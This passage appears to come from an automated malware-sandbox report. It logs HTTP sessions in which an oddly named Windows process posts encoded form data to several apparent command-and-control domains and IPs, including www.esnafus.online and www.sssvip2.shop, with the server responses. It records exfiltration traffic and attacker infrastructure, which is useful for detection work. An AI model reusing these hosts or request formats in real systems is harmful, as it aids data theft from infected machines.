                                                                  Data Ascii: 3h=FGWLkT63VAAFoI+koRRNYwbMrQ3b8alGsuu1+lr45J6oeuIi9a1RlMqhtzLrXJrRMdPmvyWqzlZJLCmVtwymJLhY2CiouiK/hgNM49kuhy/9L0ljrfmgay4Mx6IoxCdx+eEQm+UhvTQk9bIPzjfqJNjpScmYuZxbsq41MwBcbLaHod6tRaFKUAVgTmCL6ZbXSg==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.45003285.159.66.93801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:03.855757952 CET748OUTPOST /xmwd/ HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.esnafus.online
                                                                  Referer: http://www.esnafus.online/xmwd/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 47 57 4c 6b 54 36 33 56 41 41 46 71 70 4f 6b 6b 53 70 4e 51 77 62 54 75 51 33 62 6c 71 6c 43 73 75 69 31 2b 67 4b 6a 35 37 75 6f 65 4c 30 69 38 59 4e 52 73 63 71 68 69 54 4c 6b 4b 35 72 59 4d 64 44 45 76 33 32 71 7a 6c 4e 4a 4c 41 75 56 74 48 6d 6c 47 37 68 67 37 69 69 75 71 69 4b 2f 68 67 4e 4d 34 39 77 45 68 79 58 39 4c 46 56 6a 74 2b 6d 68 57 53 34 50 35 61 49 6f 6e 79 64 74 2b 65 45 58 6d 2f 59 50 76 57 63 6b 39 61 34 50 79 79 66 70 41 4e 6a 72 50 4d 6e 50 2b 4b 4a 52 6f 49 5a 65 43 54 73 6e 59 35 76 72 70 62 33 33 41 72 6b 64 47 41 78 54 4f 68 4c 2f 33 61 6d 65 4a 6c 69 43 68 46 6a 6b 64 69 65 70 4c 4a 37 41 38 67 73 42 34 4f 63 3d
                                                                  Data Ascii: 3h=FGWLkT63VAAFqpOkkSpNQwbTuQ3blqlCsui1+gKj57uoeL0i8YNRscqhiTLkK5rYMdDEv32qzlNJLAuVtHmlG7hg7iiuqiK/hgNM49wEhyX9LFVjt+mhWS4P5aIonydt+eEXm/YPvWck9a4PyyfpANjrPMnP+KJRoIZeCTsnY5vrpb33ArkdGAxTOhL/3ameJliChFjkdiepLJ7A8gsB4Oc=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.45003385.159.66.93801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:06.404608011 CET10830OUTPOST /xmwd/ HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.esnafus.online
                                                                  Referer: http://www.esnafus.online/xmwd/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 47 57 4c 6b 54 36 33 56 41 41 46 71 70 4f 6b 6b 53 70 4e 51 77 62 54 75 51 33 62 6c 71 6c 43 73 75 69 31 2b 67 4b 6a 35 36 57 6f 65 64 67 69 39 2f 68 52 32 63 71 68 76 7a 4c 6e 4b 35 71 61 4d 65 7a 41 76 33 71 36 7a 6d 31 4a 4b 6a 32 56 76 32 6d 6c 52 4c 68 67 6e 53 69 76 75 69 4c 72 68 6b 6f 6b 34 39 67 45 68 79 58 39 4c 48 64 6a 75 76 6d 68 55 53 34 4d 78 36 49 4e 78 43 64 52 2b 65 73 59 6d 2f 4d 78 76 69 67 6b 38 36 6f 50 31 41 48 70 50 4e 6a 6c 4f 4d 6e 48 2b 4c 30 4c 6f 49 31 34 43 53 5a 76 59 36 7a 72 72 4d 4b 78 65 36 30 39 45 43 68 4a 56 57 7a 55 35 36 4b 43 48 32 6d 37 75 46 58 6b 59 6d 47 67 51 36 72 45 68 44 41 47 6c 61 51 43 72 6c 74 6c 43 72 6a 6e 66 5a 70 30 65 2f 5a 45 2f 30 79 67 75 4a 4d 38 30 73 75 4b 70 42 79 78 6b 71 70 43 34 67 33 6e 77 2b 69 52 55 6b 66 32 6b 36 63 66 37 56 63 75 41 78 73 4d 6f 53 45 53 44 75 6c 54 47 35 73 6c 38 4e 6f 4f 43 6f 52 47 58 4e 6c 74 6a 4d 4c 78 36 53 65 51 51 36 73 4b 76 57 64 53 67 5a 41 7a 32 35 33 4f 4b 2b 4f 78 78 46 61 64 69 6c 51 [TRUNCATED]
                                                                  Data Ascii: 3h=FGWLkT63VAAFqpOkkSpNQwbTuQ3blqlCsui1+gKj56Woedgi9/hR2cqhvzLnK5qaMezAv3q6zm1JKj2Vv2mlRLhgnSivuiLrhkok49gEhyX9LHdjuvmhUS4Mx6INxCdR+esYm/Mxvigk86oP1AHpPNjlOMnH+L0LoI14CSZvY6zrrMKxe609EChJVWzU56KCH2m7uFXkYmGgQ6rEhDAGlaQCrltlCrjnfZp0e/ZE/0yguJM80suKpByxkqpC4g3nw+iRUkf2k6cf7VcuAxsMoSESDulTG5sl8NoOCoRGXNltjMLx6SeQQ6sKvWdSgZAz253OK+OxxFadilQELjdNS8ARvgw7jJ1XFehUaw/QMNXW5YB4h/wD/30wa0ZPmJXGrtXqAnjaotb/NxjCp/u92dk8y1VCvJYm1ek4l0HGhKp80PvUaxHzYO4p/EElqvCMjqLjC0lUPxibjszFUEjY3uJ/19pfWYrusFHNx7DvrbzeQsh6Z3GbGONKpLmhmtQ12araMFAGDmm6hJVH3Rw36RqRON+9pBP4UNfe+mgI+DIKk8IlI+l+/6VRZb3s3v7nWM+aVhBstR4iYTLMao3w6a8z8QQdHxMmSVd8c+gIxPEHY6kOxWaJvOndcxpnyiBeB3Dv5E6xwO6Qh0fbA0yeZi2FlNc0v8U+rmAlmuVnqjBxSrTlz5LEdo+ewmnNawbN5P8W6/dxdJizqsggLZfWI60cwZLof9BwWnt61bqRTDbwONeA1Ua9rc+ZKq+yubWVkuXyFPZa1kaEXPqxJpKQYVYMWhM399MJ4YuBy4QKpJJTXcLcnG0P0DMvz+fF3Ya3nwmCiP65HMA5CFpOqbJBkATOKHA9WRDc0Glhfve4P3BIoIduk4zmn4DoBBmt8WpUssdTvdgKvByYb+T9y7ZlDga48eBQZgEGQUzkVI8Lzw5D6PFoHJI6zeR4ut3S6XBSpMUa+658iVuuB1mxA/8JC1b+aOYujAIsduJwyzxyIH4+kHAdz [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.45003485.159.66.93801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:08.944063902 CET460OUTGET /xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs= HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:53:09.657424927 CET225INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.14.1
                                                                  Date: Fri, 10 Jan 2025 17:53:09 GMT
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  X-Rate-Limit-Limit: 5s
                                                                  X-Rate-Limit-Remaining: 19
                                                                  X-Rate-Limit-Reset: 2025-01-10T17:53:14.5483463Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.450035156.253.8.115801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:14.735112906 CET722OUTPOST /cf1q/ HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.sssvip2.shop
                                                                  Referer: http://www.sssvip2.shop/cf1q/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 4e 73 54 35 79 64 30 62 50 41 45 74 55 59 53 58 6d 35 75 68 31 51 61 69 4d 75 59 6d 66 78 64 39 73 59 39 6c 4d 4f 63 55 68 6b 6b 76 76 7a 65 41 35 6f 4f 6d 68 72 57 72 68 43 73 34 4c 44 66 69 43 67 71 5a 6c 53 5a 6d 6a 44 39 66 77 7a 2b 63 69 59 6d 55 72 59 7a 5a 6d 58 45 52 43 6a 39 67 43 41 61 77 52 67 75 52 6e 4e 70 50 69 61 41 61 2b 2f 68 6e 77 6c 37 74 4a 49 75 75 75 73 67 4e 6e 4f 71 6b 39 6c 33 74 6e 6f 6d 52 51 72 66 62 41 52 7a 63 30 73 68 63 35 61 42 63 6f 58 70 75 45 73 67 4c 66 62 67 4e 4b 56 62 48 74 46 6a 55 4e 39 53 73 74 49 45 64 6a 73 6e 68 4c 6b 5a 46 58 77 3d 3d
                                                                  Data Ascii: 3h=NsT5yd0bPAEtUYSXm5uh1QaiMuYmfxd9sY9lMOcUhkkvvzeA5oOmhrWrhCs4LDfiCgqZlSZmjD9fwz+ciYmUrYzZmXERCj9gCAawRguRnNpPiaAa+/hnwl7tJIuuusgNnOqk9l3tnomRQrfbARzc0shc5aBcoXpuEsgLfbgNKVbHtFjUN9SstIEdjsnhLkZFXw==
                                                                  Jan 10, 2025 18:53:15.725756884 CET339INHTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:15 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=d46a039ef821422e6fe04eec797044e7; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.450036156.253.8.115801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:17.276911974 CET742OUTPOST /cf1q/ HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.sssvip2.shop
                                                                  Referer: http://www.sssvip2.shop/cf1q/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 4e 73 54 35 79 64 30 62 50 41 45 74 56 34 69 58 6b 65 36 68 67 41 61 6c 49 65 59 6d 4b 42 64 78 73 59 68 6c 4d 50 70 50 69 57 51 76 75 52 57 41 2b 71 32 6d 79 62 57 72 35 53 73 39 45 6a 66 70 43 67 57 2f 6c 58 5a 6d 6a 41 42 66 77 33 36 63 69 72 65 62 72 49 7a 66 34 33 45 66 63 54 39 67 43 41 61 77 52 67 37 32 6e 4e 78 50 69 72 77 61 2b 64 4a 6b 2b 46 37 73 59 49 75 75 34 63 67 42 6e 4f 71 4b 39 6b 72 48 6e 75 69 52 51 75 37 62 44 46 6e 66 2b 73 68 53 33 36 42 58 6a 6d 77 72 4b 35 4e 59 55 36 67 55 4f 33 54 37 6c 6a 75 4f 63 4d 7a 37 2f 49 67 75 2b 72 75 56 47 6e 6b 4d 4d 30 44 68 77 55 58 6d 79 69 50 5a 52 77 62 76 53 33 31 57 34 6f 63 3d
                                                                  Data Ascii: 3h=NsT5yd0bPAEtV4iXke6hgAalIeYmKBdxsYhlMPpPiWQvuRWA+q2mybWr5Ss9EjfpCgW/lXZmjABfw36cirebrIzf43EfcT9gCAawRg72nNxPirwa+dJk+F7sYIuu4cgBnOqK9krHnuiRQu7bDFnf+shS36BXjmwrK5NYU6gUO3T7ljuOcMz7/Igu+ruVGnkMM0DhwUXmyiPZRwbvS31W4oc=
                                                                  Jan 10, 2025 18:53:18.300914049 CET339INHTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:18 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=41ecd998e6400453eb4c1b432d1e78c9; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.450037156.253.8.115801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:19.826001883 CET10824OUTPOST /cf1q/ HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.sssvip2.shop
                                                                  Referer: http://www.sssvip2.shop/cf1q/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 4e 73 54 35 79 64 30 62 50 41 45 74 56 34 69 58 6b 65 36 68 67 41 61 6c 49 65 59 6d 4b 42 64 78 73 59 68 6c 4d 50 70 50 69 57 49 76 75 6b 61 41 2b 4e 69 6d 78 62 57 72 78 79 73 38 45 6a 66 6f 43 6b 36 37 6c 58 6b 45 6a 47 46 66 2f 30 69 63 7a 75 79 62 34 6f 7a 66 69 58 45 53 43 6a 39 51 43 41 71 30 52 67 72 32 6e 4e 78 50 69 6f 59 61 71 66 68 6b 75 31 37 74 4a 49 75 79 75 73 67 6c 6e 4f 43 38 39 6b 66 39 6e 2b 43 52 54 49 62 62 47 7a 62 66 32 73 68 51 77 36 41 58 6a 6d 4d 67 4b 39 74 55 55 36 55 75 4f 31 50 37 67 47 48 4e 65 34 33 7a 6f 71 6f 57 70 6f 61 70 4f 46 34 4f 4c 47 44 64 34 58 7a 63 69 69 37 79 4a 7a 2b 35 42 57 6f 56 6d 34 2b 31 69 38 5a 31 72 73 39 53 46 37 74 4b 76 6e 30 66 65 58 64 45 41 67 49 75 30 36 65 58 37 76 62 4d 6a 4d 43 69 33 63 6d 6e 64 6a 70 70 71 72 64 47 73 31 66 65 6a 71 36 49 32 71 69 6d 6c 33 33 32 76 66 2f 69 68 75 4d 47 4a 46 47 48 49 64 50 78 41 2f 44 37 6d 6f 38 42 72 48 41 38 54 64 51 77 66 4d 37 48 37 39 6c 52 77 31 47 49 50 6c 6d 62 41 70 6a 38 56 71 76 [TRUNCATED]
                                                                  Data Ascii: 3h=NsT5yd0bPAEtV4iXke6hgAalIeYmKBdxsYhlMPpPiWIvukaA+NimxbWrxys8EjfoCk67lXkEjGFf/0iczuyb4ozfiXESCj9QCAq0Rgr2nNxPioYaqfhku17tJIuyusglnOC89kf9n+CRTIbbGzbf2shQw6AXjmMgK9tUU6UuO1P7gGHNe43zoqoWpoapOF4OLGDd4Xzcii7yJz+5BWoVm4+1i8Z1rs9SF7tKvn0feXdEAgIu06eX7vbMjMCi3cmndjppqrdGs1fejq6I2qiml332vf/ihuMGJFGHIdPxA/D7mo8BrHA8TdQwfM7H79lRw1GIPlmbApj8Vqv9TdQvI45WZI/jz5VHeVbguqrBVKp0iZBTOwTGPCEISdmKe6HGe6hQfBphG7AaK+Xe8cPDAHIVZCTHP4VC9nqvg4dzFA6E3LfbXV0zrWubBMdgdpFbqc96N/yBQBx0eVsWGmHr/2PnpvashbfFdgmDxbvF7oXT0/nLXAu2jKaZcq3SIfhmCB89FouILaQJ9a9EtFBm3w4p3apHBMBk7Ak7HB0MPSr4bKiY8B1Rty7xnBhYP/QyihVglM7tnzOlNYkVPJOkR2WUHNh7SguSpBGKYLtb+MhVjBcSQEFXpJO+S8UOQYim4OGJm0rZBaxCCkFzkdng5I4PNZgy8ZHwWrSVdb89vGCwQ8qwnIUgEIeFplWXdBHQ3BUQWc41087cifwJbQP7pp0gQQqcIuedLLAOfj/3iJOBzXo3/FlBs/Bl5neijA64sUAkq2Mvnisn4catq67+88sZgqMN6H7wR9mfn4Ug/0alMDNxrO27/BUUtoBXDFsdYcAFdpZZnu+56eMuFjZZ03qNdDLVA3cEz24XDlR/u6SxKJRw9CdgJODWEY7RELfFKdBOmiwi84olN151HkGvASahe71H15Gq7xev5qjOYrvmOJDnShXAidFTe9O33MvfBavhBAA6QZRHP8Kms8j/QM4akxJ6TJ8WuWY+akna6BdmCeSnG [TRUNCATED]
                                                                  Jan 10, 2025 18:53:21.086890936 CET339INHTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:20 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=525376cef77ec8f39174c627b6f5d9b5; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.450038156.253.8.115801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:22.369898081 CET458OUTGET /cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:53:23.350660086 CET339INHTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:23 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=e92edce6417e7cc5f038da05329ff74a; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.45003913.248.169.48801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:28.435842037 CET725OUTPOST /5g1j/ HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.shipley.group
                                                                  Referer: http://www.shipley.group/5g1j/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 79 52 61 31 30 4c 35 45 7a 42 31 34 31 44 4d 45 73 53 53 57 4d 31 42 51 77 30 66 54 65 30 67 48 35 47 58 73 53 49 4f 4c 69 6e 62 4f 2f 49 68 76 2b 33 4c 48 55 55 5a 52 39 39 2b 46 43 44 37 7a 4e 58 39 4f 70 48 4e 5a 4d 31 67 2b 48 39 2b 34 6d 53 5a 6f 6d 5a 38 43 6d 61 34 79 2b 76 31 48 6a 51 65 4b 69 79 54 6f 6e 77 55 4c 45 6e 42 57 50 68 63 50 72 73 70 72 6f 32 34 39 31 39 4c 6b 38 57 63 47 75 6c 49 76 65 57 45 56 48 4f 54 42 54 75 55 5a 4c 55 48 6a 4a 6f 76 39 66 78 50 32 65 30 57 61 38 72 44 48 72 6e 61 77 56 4a 4d 5a 73 4e 70 38 70 43 66 65 38 57 62 4c 72 7a 55 59 67 3d 3d
                                                                  Data Ascii: 3h=FyRa10L5EzB141DMEsSSWM1BQw0fTe0gH5GXsSIOLinbO/Ihv+3LHUUZR99+FCD7zNX9OpHNZM1g+H9+4mSZomZ8Cma4y+v1HjQeKiyTonwULEnBWPhcPrspro24919Lk8WcGulIveWEVHOTBTuUZLUHjJov9fxP2e0Wa8rDHrnawVJMZsNp8pCfe8WbLrzUYg==
                                                                  Jan 10, 2025 18:53:29.024465084 CET73INHTTP/1.1 405 Method Not Allowed
                                                                  content-length: 0
                                                                  connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.45004013.248.169.48801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:30.980751991 CET745OUTPOST /5g1j/ HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.shipley.group
                                                                  Referer: http://www.shipley.group/5g1j/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 79 52 61 31 30 4c 35 45 7a 42 31 36 57 62 4d 48 50 36 53 55 73 31 47 56 77 30 66 47 75 30 6b 48 35 4b 58 73 54 39 52 4b 51 54 62 58 65 34 68 75 36 44 4c 58 45 55 5a 5a 64 39 2f 59 79 44 4b 7a 4e 4c 66 4f 71 66 4e 5a 4d 78 67 2b 46 6c 2b 37 51 61 65 79 57 5a 79 58 57 61 36 32 2b 76 31 48 6a 51 65 4b 69 58 47 6f 6e 34 55 49 30 33 42 45 36 4e 66 4d 72 73 71 73 6f 32 34 35 31 39 50 6b 38 57 45 47 76 49 6a 76 62 53 45 56 46 6d 54 42 69 75 62 58 4c 56 4d 6e 4a 70 61 34 2f 6f 58 30 72 46 62 59 61 33 68 4a 62 58 68 31 54 45 57 49 64 73 2b 75 70 6d 73 44 37 66 76 47 6f 4f 64 44 6c 58 63 34 75 73 59 6e 6e 66 4d 79 79 71 42 69 68 6b 65 36 55 73 3d
                                                                  Data Ascii: 3h=FyRa10L5EzB16WbMHP6SUs1GVw0fGu0kH5KXsT9RKQTbXe4hu6DLXEUZZd9/YyDKzNLfOqfNZMxg+Fl+7QaeyWZyXWa62+v1HjQeKiXGon4UI03BE6NfMrsqso24519Pk8WEGvIjvbSEVFmTBiubXLVMnJpa4/oX0rFbYa3hJbXh1TEWIds+upmsD7fvGoOdDlXc4usYnnfMyyqBihke6Us=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.45004113.248.169.48801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:53:33.527383089 CET10827OUTPOST /5g1j/ HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.shipley.group
                                                                  Referer: http://www.shipley.group/5g1j/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 79 52 61 31 30 4c 35 45 7a 42 31 36 57 62 4d 48 50 36 53 55 73 31 47 56 77 30 66 47 75 30 6b 48 35 4b 58 73 54 39 52 4b 51 4c 62 4c 39 77 68 76 62 44 4c 46 55 55 5a 58 39 39 69 59 79 44 58 7a 4e 44 62 4f 74 57 36 5a 50 5a 67 2b 6d 74 2b 7a 43 79 65 38 6d 5a 79 49 47 61 35 79 2b 76 46 48 6a 41 61 4b 69 48 47 6f 6e 34 55 49 79 54 42 54 2f 68 66 4b 72 73 70 72 6f 32 30 39 31 39 33 6b 38 65 55 47 76 39 59 76 50 6d 45 57 6c 57 54 53 41 57 62 49 62 56 4f 67 4a 70 43 34 2f 55 32 30 71 74 39 59 61 72 62 4a 59 4c 68 31 6c 49 56 4e 75 49 79 30 71 76 79 66 36 6e 4c 65 49 61 54 46 6d 6e 64 35 4d 68 45 37 30 66 54 35 69 36 4d 6e 6a 42 59 6f 78 55 6b 6b 76 44 4e 66 48 2f 39 63 73 6b 33 68 35 57 4b 2b 30 59 59 68 59 75 74 33 53 41 52 34 39 65 4e 33 44 2f 6b 55 74 58 36 72 42 48 55 68 6c 70 45 78 47 4e 38 30 38 4a 75 77 52 6e 2b 57 37 46 75 46 6b 49 57 48 58 52 37 63 2f 50 4b 70 4f 43 65 46 6e 56 78 38 45 61 36 2f 4f 56 61 36 47 62 6a 38 33 4f 54 42 4b 35 5a 4d 6e 58 5a 6d 71 4e 37 4f 53 50 6a 33 63 6e [TRUNCATED]
